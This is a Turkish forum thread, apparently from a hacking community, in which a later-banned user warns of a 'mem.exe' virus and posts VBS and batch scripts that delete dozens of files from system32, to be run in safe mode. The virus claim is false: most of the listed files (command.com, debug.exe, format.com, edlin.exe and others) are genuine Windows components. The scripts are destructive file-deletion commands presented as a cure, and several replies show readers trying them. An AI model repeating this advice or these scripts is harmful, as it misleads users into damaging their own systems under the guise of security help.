İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

mem.exe virüsüne dikkat

06-08-2012 12:58
#1
hajking - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
22
Mesajlar:
774
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Konular:
26
Arkadaşlar bugün pcimde bir şey fark ettim mem.exe adında bi virüs yemişim nasıl anladım şöyle system32 de gezinirken gözüme acayip exe dosyaları takıldı mem.exe fastopen.exe vs...
bu dosyaların üzerinde mouse oynatınca hani dosyanın üstünde mouse oynatırsın dosya sürümü şirket adı fln çıkarya onlar yoktu yani system dosyası olsa microsoft fln diye yazardı bunda bi tek dosya boyutu yazıyodu neyse baya araştırınca bunun gerçektende virüsü olduğunu anladım bu crypt lı bi virüs mcafee falan tanımadı eset kullanıyodum dosyayı yollamama izin vermiyodu sonra bun çözümünü ne antivirüs sitesinde nede diğer yapandı forum sitelerinde buldum dosyauzantısı adında bir sitede bi vatandaşın yaptığı yorumda çözümü işle birlikte yazmışlar yani tek ben değilmişim ne neyse arkadaşlar çözümü çok basit
Kod:
on error resume next
set file = createobject("Scripting.FileSystemObject")
file.DeleteFile "C:\windows\system32\mem.exe"
file.DeleteFile "C:\windows\system32\mem.pif"
file.DeleteFile "C:\windows\system32\mem.PIF"
file.DeleteFile "C:\windows\system32\mmtask.tsk"
file.DeleteFile "C:\windows\system32\msctfime.ime"
file.DeleteFile "C:\windows\system32\nw16.exe"
file.DeleteFile "C:\windows\system32\redir.exe"
file.DeleteFile "C:\windows\system32\share.exe"
file.DeleteFile "C:\windows\system32\shfolder.inf"
file.DeleteFile "C:\windows\system32\v7vga.rom"
file.DeleteFile "C:\windows\system32\vwipxspx.exe"
file.DeleteFile "C:\windows\system32\chcp.com"
file.DeleteFile "C:\windows\system32\chcfg.exe"
file.DeleteFile "C:\windows\system32\command.com"
file.DeleteFile "C:\windows\system32\debug.exe"
file.DeleteFile "C:\windows\system32\diskcomp.com"
file.DeleteFile "C:\windows\system32\diskcopy.com"
file.DeleteFile "C:\windows\system32\dosx.exe"
file.DeleteFile "C:\windows\system32\wlcomm.exe"
file.DeleteFile "C:\windows\system32\edlin.exe"
file.DeleteFile "C:\windows\system32\edit.com"
file.DeleteFile "C:\windows\system32\fastopen.exe"
file.DeleteFile "C:\windows\system32\format.com"
file.DeleteFile "C:\windows\system32\graphics.com"
file.DeleteFile "C:\windows\system32\graftabl.com"
file.DeleteFile "C:\windows\system32\keyboard.sys"
file.DeleteFile "C:\windows\system32\nlsfunc.exe"
file.DeleteFile "C:\windows\system32\append.exe"
file.DeleteFile "C:\windows\system32\exe2bin.exe"
file.DeleteFile "C:\windows\system32\imjpinst.exe"
file.DeleteFile "C:\windows\system32\imscinst.exe"
file.DeleteFile "C:\windows\system32\mscdexnt.exe"
file.DeleteFile "C:\windows\system32\nlsfunc.exe"
file.DeleteFile "C:\windows\system32\pintlphr.exe"
file.DeleteFile "C:\windows\system32\vwipxspx.exe"
file.DeleteFile "C:\windows\system32\wmptour.hta"
file.DeleteFile "C:\windows\system32\Eset_TrialReset_serv.exe"
file.DeleteFile "C:\windows\system32\Cleanup.exe"
ya bunu notepade farklı kaydet yapıp uzantısını vbs yapın da çalıştırın

yada

Kod:
del mem.exe
del mem.pif
del mem.PIF
del mmtask.tsk
del msctfime.ime
del nw16.exe
del redir.exe
del share.exe
del shfolder.inf
del v7vga.rom
del vwipxspx.exe
del chcp.com
del ChCfg.exe
del command.com
del debug.exe
del diskcomp.com
del diskcopy.com
del dosx.exe
del wlcomm.exe
del edlin.exe
del edit.com
del fastopen.exe
del format.com
del graphics.com
del graftabl.com
del keyboard.sys
del nlsfunc.exe
del append.exe
del exe2bin.exe
del imjpinst.exe
del imscinst.exe
del mscdexnt.exe
del nlsfunc.exe
del pintlphr.exe
del vwipxspx.exe
del wmptour.hta
del Eset_TrialReset_serv.exe
del Cleanup.exe
bunun uzantısını .bat yapın

not: bunların işe yaraması için virüslü bilgisayarı güvenli modda açıp .bat yada .vbs uzantılı dosyayı system32 klasörünün içine atıpta çalıştırın
arkadaşlar unutmayın ki bu cryptlı bi virüs en iyi antivirüs bile tanımadı şuanda tek yol bu
teşekkürü çok görmeyin
|~Hérmés~|, oguz454 Teşekkür etti.

06-08-2012 13:05
#2
del piero - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Nereden:
Evden :)
Mesajlar:
118
Teşekkür (Etti):
36
Teşekkür (Aldı):
11
Konular:
6
teşekkürler bizde dikkat edelim
Kullanıcı İmzası
Notre Dame' ın Hacker' i
06-08-2012 13:13
#3
hajking - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
22
Mesajlar:
774
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Konular:
26
system32 de belittiğim dosyalar varmı bak çünkü gerçekten ben yani bu güne kadar anlamadım bunların pcmde olduğunu
06-08-2012 14:36
#4
oguz454 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Mesajlar:
10
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Konular:
0
yardım edin bende nerdeyse hepsi vardı güvenli modda hem vbs uzantılı hemde bat uzantılı yaptım hiç ibiri silinmedi acaba virüs etkinliğini kaybetmişmidir
aynısınıı arkime söyledim oda aynısı
06-08-2012 14:45
#5
METEOUR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2012
Nereden:
Elazığ
Mesajlar:
71
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Konular:
4
Hacı geçen sefer ezik bir .bat yedim(ESET in allah belasını versin)Tüm system32 silindi.
Kullanıcı İmzası
''Bu hayatta yaptırmak istediklerinin adını iyilik koymuşlar''




---------------H4CK3D By M3T30UR-------------

Facebook Profilhttp://www.facebook.com/Legend785
06-08-2012 14:45
#6
del piero - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Nereden:
Evden :)
Mesajlar:
118
Teşekkür (Etti):
36
Teşekkür (Aldı):
11
Konular:
6
baktım yok temiz
Kullanıcı İmzası
Notre Dame' ın Hacker' i
06-08-2012 14:48
#7
macgyver - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Mesajlar:
2.866
Teşekkür (Etti):
249
Teşekkür (Aldı):
435
Konular:
92
bende var kısayolu ile birlikte eyw hacı...
Kullanıcı İmzası
Ben iyi bir adam olamadım ama kimsenin de adamı olmadım!
06-08-2012 14:49
#8
oguz454 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Mesajlar:
10
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Konular:
0
yardım edin bende var ama silinmio dneddim okodlarla güvenli modda normal modda yok
06-08-2012 14:50
#9
hajking - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
22
Mesajlar:
774
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Konular:
26
Alıntı:
oguz454´isimli üyeden Alıntı Mesajı göster
yardım edin bende nerdeyse hepsi vardı güvenli modda hem vbs uzantılı hemde bat uzantılı yaptım hiç ibiri silinmedi acaba virüs etkinliğini kaybetmişmidir
aynısınıı arkime söyledim oda aynısı
güvenli modda çalıştırdın ve olmadımı
06-08-2012 14:56
#10
oguz454 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Mesajlar:
10
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Konular:
0
Alıntı:
hajking´isimli üyeden Alıntı Mesajı göster
güvenli modda çalıştırdın ve olmadımı
evet hem normal hem güvenli mod

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı